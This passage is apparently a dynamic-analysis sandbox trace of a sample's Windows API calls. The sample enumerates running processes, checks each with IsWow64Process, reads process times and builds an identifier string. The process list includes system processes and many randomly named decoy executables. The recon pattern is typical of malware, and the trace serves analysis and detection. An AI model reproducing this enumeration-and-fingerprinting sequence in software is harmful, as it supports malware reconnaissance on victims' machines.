	[0126.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5b08, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0126.026] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.026] CloseHandle (hObject=0x69c) returned 1
	[0126.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d2a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16e18) returned 0xc0000004
	[0126.060] VirtualAlloc (lpAddress=0x0, dwSize=0x16f18, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0126.060] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16f18, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0126.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0126.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5970, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0126.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.066] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.066] CloseHandle (hObject=0x69c) returned 1
	[0126.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.066] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d4c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.067] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.067] CloseHandle (hObject=0x69c) returned 1
	[0126.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d2a8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0126.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.067] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.067] CloseHandle (hObject=0x69c) returned 1
	[0126.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.068] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.068] CloseHandle (hObject=0x69c) returned 1
	[0126.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.068] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.068] CloseHandle (hObject=0x69c) returned 1
	[0126.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.068] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.068] CloseHandle (hObject=0x69c) returned 1
	[0126.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.069] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.069] CloseHandle (hObject=0x69c) returned 1
	[0126.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.069] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.069] CloseHandle (hObject=0x69c) returned 1
	[0126.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.070] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.070] CloseHandle (hObject=0x69c) returned 1
	[0126.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.070] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.070] CloseHandle (hObject=0x69c) returned 1
	[0126.070] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.070] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.070] CloseHandle (hObject=0x69c) returned 1
	[0126.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d428, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.071] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.071] CloseHandle (hObject=0x69c) returned 1
	[0126.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0126.071] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.071] CloseHandle (hObject=0x69c) returned 1
	[0126.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d368, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0126.071] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.072] CloseHandle (hObject=0x69c) returned 1
	[0126.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0126.072] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.072] CloseHandle (hObject=0x69c) returned 1
	[0126.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d428, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.072] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.072] CloseHandle (hObject=0x69c) returned 1
	[0126.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0126.073] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.073] CloseHandle (hObject=0x69c) returned 1
	[0126.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0126.073] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.073] CloseHandle (hObject=0x69c) returned 1
	[0126.073] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d2c8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0126.073] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.073] CloseHandle (hObject=0x69c) returned 1
	[0126.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d248, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0126.074] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.074] CloseHandle (hObject=0x69c) returned 1
	[0126.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.074] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.074] CloseHandle (hObject=0x69c) returned 1
	[0126.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0126.074] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.074] CloseHandle (hObject=0x69c) returned 1
	[0126.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b97a8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0126.075] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.075] CloseHandle (hObject=0x69c) returned 1
	[0126.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.075] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.075] CloseHandle (hObject=0x69c) returned 1
	[0126.075] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0126.075] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.075] CloseHandle (hObject=0x69c) returned 1
	[0126.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d548, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0126.076] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.076] CloseHandle (hObject=0x69c) returned 1
	[0126.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0126.076] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.076] CloseHandle (hObject=0x69c) returned 1
	[0126.076] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d248, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0126.076] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.077] CloseHandle (hObject=0x69c) returned 1
	[0126.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0126.077] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.077] CloseHandle (hObject=0x69c) returned 1
	[0126.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b97a8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0126.077] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0126.077] CloseHandle (hObject=0x69c) returned 1
	[0126.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.078] GetLastError () returned 0x5
	[0126.079] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0126.079] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0126.079] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.079] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.080] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
	[0126.081] GetLastError () returned 0x5
